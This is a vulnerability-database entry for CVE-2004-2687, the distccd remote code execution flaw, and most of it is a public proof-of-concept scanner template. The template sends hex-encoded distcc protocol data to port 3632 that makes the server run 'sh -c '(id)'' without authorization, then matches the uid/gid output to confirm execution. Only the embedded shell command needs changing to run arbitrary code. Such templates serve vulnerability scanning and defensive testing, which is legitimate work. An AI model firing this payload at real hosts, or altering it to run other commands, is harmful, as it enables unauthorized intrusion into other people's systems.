漏洞描述
distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.
CVE-2004-2687: Distccd v1 - Remote Code Execution
PoC代码[已公开]
id: CVE-2004-2687
info:
name: Distccd v1 - Remote Code Execution
author: pussycat0x
severity: high
description: |
distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.
reference:
- http://distcc.samba.org/security.html
- http://lists.samba.org/archive/distcc/2004q3/002550.html
- http://lists.samba.org/archive/distcc/2004q3/002562.html
- https://github.com/crypticdante/distccd_rce_CVE-2004-2687
- https://github.com/gwyomarch/Lame-HTB-Writeup-FR
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C
cvss-score: 9.3
cve-id: CVE-2004-2687
cwe-id: CWE-16
epss-score: 0.8951
epss-percentile: 0.99533
cpe: cpe:2.3:a:apple:xcode:1.5:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
tags: cve,cve2004,network,rce,distccd
tcp:
- inputs:
- data: 444953543030303030303031
type: hex
- data: 41524743303030303030303841524756303030303030303273684152475630303030303030322d634152475630303030303030637368202d6320272869642927415247563030303030303031234152475630303030303030322d634152475630303030303030366d61696e2e634152475630303030303030322d6f4152475630303030303030366d61696e2e6f444f5449303030303030303141
type: hex
host:
- "{{Hostname}}"
port: 3632
matchers:
- type: regex
part: raw
regex:
- "uid=[0-9]+.*gid=[0-9]+.*"
# digest: 490a00463044022020157c511f2e2882fb82a0c915d755237a75951de03a452ad6cf55fe0efad69802201b59bd257ce34d6bb99a411f43b1913f30a1e3ab8acb35159cd5d3660bf99e3a:922c64590222798bb761d5b6d8e72950